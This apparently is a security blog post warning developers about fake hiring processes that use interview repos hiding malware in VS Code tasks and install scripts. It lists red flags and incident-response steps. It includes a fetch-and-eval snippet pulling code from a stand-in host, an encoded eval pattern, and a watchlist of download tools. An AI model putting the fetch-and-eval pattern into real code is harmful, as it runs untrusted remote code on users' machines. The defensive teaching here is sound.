March 6, 2026 · 9 min read
Scam targeting IT pros: malicious repos in the hiring process
A practical warning for developers about fake interview assignments that hide malware in repos, VS Code tasks, and install scripts.
A growing scam is targeting developers through fake hiring flows. The pattern looks professional at first: outreach, interview call, and then a repo to review or run.
The trap is usually hidden in automation hooks like .vscode/tasks.json, package.json scripts, or shell commands that fetch and execute code from external sources.
This post summarizes how the attack works, what to inspect before running anything, and what to do if you already executed suspicious code.
How this scam usually unfolds
Attackers pose as recruiters or engineering leads and present what looks like a legitimate interview assignment. They often use convincing project context, realistic communication, and urgency to push you into running the project quickly.
The payload is commonly not obvious in source files. Instead, it is triggered through tasks, scripts, or setup flows that developers run by habit while trying to be responsive during interviews.
- Fake recruiter outreach via LinkedIn or email.
- Short trust-building interview process.
- Public repo that appears legitimate at first glance.
- Prompt to quickly clone and run while they "explain architecture."
Where malicious behavior is often hidden
The most common pattern is delayed execution: a seemingly normal project calls out to remote infrastructure and pulls additional code only at runtime.
That makes static visual inspection harder, especially under time pressure. You may not see malware directly in the initial repo files.
postinstallor other lifecycle scripts inpackage.json.- VS Code task or launch files that execute shell commands.
- Base64-encoded or obfuscated JavaScript and shell snippets.
- Use of
curl,wget,Invoke-WebRequest,powershell, or downloaded binaries. - Dynamic script fetching and execution through
evalpatterns.
What attackers are trying to steal
In most cases, the goal is data and account access, not immediate visible damage. Attackers want credentials and tokens that can be monetized or used for lateral access.
- SSH keys and GitHub personal access tokens.
- Browser session cookies.
- Crypto wallet data (for example MetaMask).
.envsecrets and CI/CD credentials.- Access to private company repositories and infrastructure.
Obfuscated code quick check
Obfuscation does not always mean malware, but it is a serious warning signal for interview assignments. Test projects should be readable and auditable.
If you see unreadable variable names, eval, encoded payloads, or remote script execution, stop and inspect in a sandbox first.
Normal code · ts
function sum(a, b) {
return a + b;
}
console.log(sum(2, 3));Obfuscated style · ts
(function(_0x3a2f1b,_0x1d4c5e){return _0x3a2f1b+_0x1d4c5e})(0x2,0x3);Unreadable variables · ts
var _0x5a12 = ['log', 'Hello world'];Encoded eval pattern · ts
eval(atob("Y29uc29sZS5sb2coJ0hlbGxvJyk="));Dynamic fetch + eval · ts
fetch("https://example.com/script.js")
.then((r) => r.text())
.then((code) => eval(code));Practical red flags during interviews
A repo link by itself is not suspicious. Many teams share take-home tasks or code samples. Risk comes from execution pressure and opaque setup instructions.
- Instructions are only "clone and run" with no clear setup docs.
- Unexpected
.vscodeautomation in a simple assignment. - Requests for GitHub token, CLI auth, private repo access, or
.envcontents without clear justification. - Commands that execute remote scripts or download binaries.
- Large amount of minified or intentionally unreadable setup logic.
What to do if you already ran it
Act fast: isolate the machine and rotate access credentials. Assume exposed secrets are compromised until proven otherwise.
- Disconnect from the network.
- Revoke and rotate GitHub tokens, SSH keys, and CI/CD credentials.
- Change passwords and invalidate active sessions.
- Check persistence points (startup items, scheduled tasks, launch agents).
- Run incident-response checks from a known-clean environment.
Final take
Developer workflows are a prime social-engineering target. Slow down before running interview code, verify every automation hook, and use isolated environments for unknown assignments.
Links:
- Fake Job Offers Are Turning GitHub Repos Into a Trap
- Don't get scammed on an interview
- I Was Given a Job Assignment That Installed Malware
- Brave New World of Scammers Targeting Developers
- Fake Job Interview Backdoor Malware Targeting Developer Machines
- VS Code Phishing Simulation for Security Awareness Training